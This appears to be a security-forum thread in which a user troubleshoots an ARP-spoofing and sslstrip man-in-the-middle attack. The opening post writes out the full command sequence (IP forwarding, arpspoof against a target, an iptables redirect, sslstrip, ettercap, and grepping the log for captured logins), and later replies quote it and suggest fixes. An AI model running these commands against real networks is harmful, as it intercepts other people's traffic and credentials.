Results 1 to 6 of 6

Thread: Ettercap and Sslstrip problem

  1. #1
    Just burned his ISO f4llcon's Avatar
    Join Date
    Oct 2010
    Location
    europe
    Posts
    4

    Default Ettercap and Sslstrip problem

    Hello

    I have a problem with the sslstip. On the victim computer (my computer) it will still show up a warning when i go on hotmail.com or mail.google.com or every other https:// website.

    What am i doing wrong? I retried over and over with your tut and other tuts. But none work.

    Last night i tried it on my other computer on my other network and it worked great with

    echo 1 > /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.0.102 192.168.0.1
    iptables --flush
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -a -l 10000
    ettercap -T -q -i wlan0
    cat sslstrip.log | grep -a name*LIKE MSN*

    but now it does not work on this network, so i tried this way.

    kate /etc/etter.conf
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0

    but none work now ? i will retry it when i am on my other network where it did work but why it isn't working in this network? I also tried in on one other network but there was the same problem.

    This is legal question for myself only and i am only using my own 3 networks and 3 computers.

    Thanks, hope to hear what's the problem.
    Or if there already such a question with answer sorry for my post, and hope someone will redirect me to that post.

    F4LLCON

    *EDIT

    Hello sorry for my fast question, i already solved it by using
    sslstrip -a -k -f -l 8080 -w stripped instead of using sslstrip -a -k -f.

    for now it works.. hope it will work always

    F4LLCON

    *EDIT 2

    NOT SOLVED ....... again it does not work. the victim computer get's warning when going on https:// website.

    Any help would be great.

    Thanks

    F4LLCON
    Last edited by f4llcon; 11-01-2010 at 04:40 PM. Reason: NOT SOLVED

  2. #2
    Junior Member
    Join Date
    Sep 2008
    Posts
    32

    Default Re: Ettercap and Sslstrip problem

    Read the man page for Ettercap - I believe it disables ip_forward when it is run.

    There are several tutorials that use arpspoof in lieu of ettercap- maybe try those to start and see if you can get things running that way.

    -- Tom

  3. #3
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    Location
    shining my spoon
    Posts
    265

    Default Re: Ettercap and Sslstrip problem

    yeah why use ettercap and arpspoof, try it with just one or the other, if you know your router and victims mac addresses using ettercap may be easier also you can try to use the gtk version its a little easier for a nub
    Wielder of the spoon of doom
    Summercon, Toorcon, Defcon, Bsides, Derbycon, Shmoocon oh my
    Come hang out with hackers on twitter @gunrunr556

  4. #4
    Just burned his ISO f4llcon's Avatar
    Join Date
    Oct 2010
    Location
    europe
    Posts
    4

    Default Re: Ettercap and Sslstrip problem

    Thank you for the replies, last night the same way worked again and i will try it again today and will reply if it worked.

    I will look into the advices.

    Thanks,

    F4LLCON

  5. #5
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Ettercap and Sslstrip problem

    What exactly did you change in /etc/etter.conf ? also There are a lot of video tutorials on how to do this on the forum I would recommend you follow one.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  6. #6
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: Ettercap and Sslstrip problem

    3 computers and 3 networks, that`s 1 computer per network right?
    So either you are poisoning yourself for this test or your telling lies, either way you need to learn some basic linux skills or/and networking
    I mean take this snippet of your post for example,
    Code:
    kate /etc/etter.conf
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0
    What is the point of the first command there, your just opening a config file with kate and doing nothing?
    I am all for teaching/learning from new comers, but your post (excuse me if I have made a terrible mistake) just seems to portray you as someone who is clueless in this area with no willingness to learn.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

Similar Threads

  1. sslstrip -a (issues with hash?) using Ettercap
    By BenzS550 in forum Beginners Forum
    Replies: 1
    Last Post: 07-02-2010, 08:00 AM
  2. sslstrip + ettercap + data inject
    By rooliger in forum Beginners Forum
    Replies: 0
    Last Post: 05-18-2010, 11:33 PM
  3. problems with arpspoof, sslstrip, ettercap
    By username324 in forum Beginners Forum
    Replies: 9
    Last Post: 03-12-2010, 12:02 AM
  4. ettercap & sslstrip question
    By mroy1300 in forum OLD Newbie Area
    Replies: 0
    Last Post: 02-01-2010, 01:55 AM
  5. Replies: 8
    Last Post: 11-26-2009, 08:09 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •